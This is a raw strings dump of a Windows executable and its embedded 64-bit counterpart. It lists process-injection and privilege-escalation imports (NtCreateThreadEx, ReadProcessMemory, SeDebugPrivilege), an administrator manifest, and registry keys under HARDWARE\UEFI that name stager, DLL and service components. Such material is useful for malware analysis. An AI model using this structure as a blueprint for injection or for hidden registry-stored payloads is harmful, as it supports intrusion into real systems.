!This program cannot be run in DOS mode.
`.rdata
@.rsrc
@.reloc
t6VVVVVV
XSVWjD
PSSSSSSSR
ntdll.dll
NtCreateThreadEx
.text$mn
.idata$5
.rdata
.rdata$voltmd
.rdata$zzzdbg
.idata$2
.idata$3
.idata$4
.idata$6
.rsrc$01
.rsrc$02
PathCombineW
StrCatW
SHLWAPI.dll
HeapFree
HeapAlloc
GetProcessHeap
TerminateProcess
WaitForSingleObject
K32EnumProcessModulesEx
OpenProcess
CloseHandle
K32EnumProcesses
ReadProcessMemory
SizeofResource
GetCurrentProcess
WriteFile
GetTempPathW
FindResourceA
CreateFileW
GetModuleHandleA
GetLastError
LockResource
DeleteFileW
LoadResource
GetProcAddress
GetCurrentProcessId
CreateProcessW
IsWow64Process
ExitProcess
KERNEL32.dll
RegOpenKeyExW
RegEnumKeyExW
RegDeleteKeyW
RegDeleteKeyExW
RegCloseKey
CryptReleaseContext
OpenProcessToken
CryptGenRandom
CryptAcquireContextW
AdjustTokenPrivileges
LookupPrivilegeValueW
RegDeleteValueW
ADVAPI32.dll
CoUninitialize
CoCreateInstance
CoInitializeSecurity
CoInitializeEx
ole32.dll
OLEAUT32.dll
!This program cannot be run in DOS mode.
`.rdata
@.pdata
@USVWAVH
A^_^[]
USVWATAUAVAWH
D!t$0L
A_A^A]A\_^[]
D;0s9A
ntdll.dll
NtCreateThreadEx
.text$mn
.idata$5
.rdata
.rdata$voltmd
.rdata$zzzdbg
.xdata
.idata$2
.idata$3
.idata$4
.idata$6
.pdata
ExitProcess
HeapFree
HeapAlloc
GetProcessHeap
TerminateProcess
K32EnumProcessModulesEx
OpenProcess
CloseHandle
K32EnumProcesses
ReadProcessMemory
GetModuleHandleA
GetLastError
GetProcAddress
GetCurrentProcessId
KERNEL32.dll
RegDeleteValueW
RegOpenKeyExW
OpenProcessToken
AdjustTokenPrivileges
LookupPrivilegeValueW
ADVAPI32.dll
CoUninitialize
CoCreateInstance
CoInitializeSecurity
CoInitializeEx
ole32.dll
OLEAUT32.dll
<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level='requireAdministrator' uiAccess='false' />
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
0$0:0Z0g0n0y0
363D3P3`3l3
4"4)4Y4c4r4
55?5\5u5~5
6$6,636E6_6z6
6&727J7k7v7
HARDWARE\UEFI\$embrconfig
Microsoft Base Cryptographic Provider v1.0
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
SeDebugPrivilege
HARDWARE\UEFI
$embrstager
$embrdll32
$embrdll64
$embrsvc32
HARDWARE\UEFI
$embrstager
$embrdll32
$embrdll64
$embrsvc64
SeDebugPrivilege